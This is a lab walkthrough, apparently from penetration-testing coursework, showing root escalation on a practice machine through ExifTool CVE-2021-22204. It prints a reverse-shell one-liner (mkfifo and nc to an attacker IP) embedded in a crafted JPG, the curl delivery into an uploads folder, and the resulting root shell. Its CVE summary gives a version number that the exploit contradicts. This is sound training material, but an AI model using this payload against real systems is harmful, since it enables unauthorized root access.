InfoSec LAB

Exfiltrated_Privilege_Escalation

Created: 2 min read

CVE-2021-22204

The target exiftool instance is older and possibly being vulnerable to CVE-2021-22204

A vulnerability has been found in ExifTool 7.44 and classified as critical. This vulnerability affects some unknown processing of the component djvu File Handler. The manipulation with an unknown input leads to a neutralization vulnerability. The CWE definition for the vulnerability is CWE-707. The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component. As an impact it is known to affect confidentiality, integrity, and availability.

Exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ searchsploit -m linux/local/50911.py ; mv 50911.py CVE-2021-22204.py
  Exploit: ExifTool 12.23 - Arbitrary Code Execution
      URL: https://www.exploit-db.com/exploits/50911
     Path: /usr/share/exploitdb/exploits/linux/local/50911.py
    Codes: CVE-2021-22204
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/PEN-200/PG_PRACTICE/exfiltrated/50911.py

Exploit locally available

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ python3 CVE-2021-22204.py -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f' -i ~/Pictures/test.jpg 
 
        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
RUNNING: UNICORD Exploit for CVE-2021-22204
PAYLOAD: (metadata "\c${system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f')};")
RUNTIME: DONE - Exploit image written to 'image.jpg'

Executing the exploit generates a malicious JPG file with an embedded payload

Exploitation

www-data@exfiltrated:/opt$ curl -s http://192.168.45.198/image.jpg -o /var/www/html/subrion/uploads/image.jpg

Delivery complete

PSPY was running in the background and captured the entire process

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ nnc 1234     
listening on [any] 1234 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.202.163] 43530
bash: cannot set terminal process group (35438): Inappropriate ioctl for device
bash: no job control in this shell
root@exfiltrated:~# whoami
whoami
root
root@exfiltrated:~# hostname
hostname
exfiltrated
root@exfiltrated:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:aa:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.202.163/24 brd 192.168.202.255 scope global ens160
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks